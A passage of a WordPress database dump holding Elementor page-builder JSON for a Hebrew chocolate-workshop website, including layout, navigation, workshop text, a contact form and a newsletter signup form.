Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(324,82,'_elementor_version','0.4'),(325,82,'_elementor_template_type','post'),(326,83,'_wp_page_template','elementor_canvas'),(327,83,'_elementor_edit_mode','builder'),(328,83,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.&nbsp;<\\/b><\\/p>\\n<p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.&nbsp;<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from 